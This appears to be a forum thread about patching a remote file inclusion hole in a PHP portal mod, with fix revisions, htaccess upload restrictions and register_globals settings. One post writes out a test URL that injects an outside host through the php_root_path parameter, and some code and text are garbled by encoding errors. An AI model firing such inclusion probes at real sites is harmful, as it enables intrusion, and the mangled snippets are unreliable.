Moderator: Integra Moderator
"Vadar";p="14537" wrote:OK, I'm the ultimate novice on php, but I'm having the same problem that Twitchy described in the ACP under the Photo Album section. I went back in and verified that I had all of the latest fixes as per the second post installed (Rev 5).
While doing that I noticed something that looked strange to me. For the fix labled function_portal.php 1 fix Rev 05 I notice that it shows: die("Hacking attempt");
For the other fixes, Hacking attempt is in single quotes vice double quotes, like this:
die('Hacking attempt');
Is that right?
For Michaelo, here is what I get when I hover my cursor over the ACP - Photo Album - CLowN SP Config link: http://www.navyjrotc.us/portal/admin/ad ... 149ade22d2
"Michaelo";p="14539" wrote:One of us is confused...
Before you can upload a file you either need ftp access or as a member you upload a file of allowed types (.gif, .png etc.).
There is no other way for a hacker to put a file on a server assuming they havent hack another site on the server in which case they may be able to cross contaminateà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦
agreedTo hack a site first you need a way in, to accomplish this you need to find a vulnerable point an exploit it, as with the recent hacks. The hackers used a remote file/script via the php_root_path weakness to execute a remote script allowing them accessà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦ Once they gained access they proceeded to either upload files to gain control of the site or, as in most cases simply used a remote script hack tool to do thisà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦
I have examined the possibility of restricting upload directories to only accept certain file such as images or zips in an effort to counter the cross contamination problemà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦ more later on thisà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦
<Directory> # Allow access to the root of the hosting folder Options None AllowOverride None Order allow,deny Allow from all <FilesMatch> # But only to files with the specified extentions Order allow,deny Deny from all </FilesMatch> <FilesMatch> Order allow,deny Allow from all </FilesMatch></Directory>
"Michaelo";p="14544" wrote:computerz, You as admin determine what can be uploaded it's in the ACP allow upload file type or something like that.
Thats good to knowyou cannot send any type of command via the address...
will most certainly!Play around with this little htaccess info and see how it goes...
- Code: Select all
<Directory> # Allow access to the root of the hosting folder Options None AllowOverride None Order allow,deny Allow from all <FilesMatch> # But only to files with the specified extentions Order allow,deny Deny from all </FilesMatch> <FilesMatch> Order allow,deny Allow from all </FilesMatch></Directory>
"ihammo";p="14568" wrote:Now I am confused
I applied all the fixes as per Rev 5 and thought I would try the exploit on my site to see if it worked.
So, i popped http://my site/portal/includes/functions.php?php_root_path=http://www.testing123.com/test.html in to a browser and I did not get a "hacking attempt" message.
has anyone else tried this on their own site to see what happens? Until I can fix this I have taken my site offline completely
<phpphpinfo>
"ihammo";p="14588" wrote:When Register_Globals was OFF I got the exact same response as you Soloman.
I added some extra code to the hacking code to display the root path that was being used and no matter what I did whilst Register_Globals was OFF I couldn't pass anything to functions.php via the URL.
However, when Register_Globals was ON, I would get the "hacking attempt. Details Logged" message when testing the URL
I take it you do have direct contol over the Register_Globals variable on your server and did check that it was ON or OFF? I created a simple php file with the code
- Code: Select all
<phpphpinfo>
which I then navigated to in my browser to check that the Register_Variable had indeed changed. I run apache under windows on my test server and had to restart apache after changing the php.ini file (which needs to be in your windows directory I think - or apache does not seem to see it [but that could be my crappy set up of apache <img> ])
php_value register_globals 0
Registered users: Bing [Bot], Google [Bot], Majestic-12 [Bot], Unspecified Bot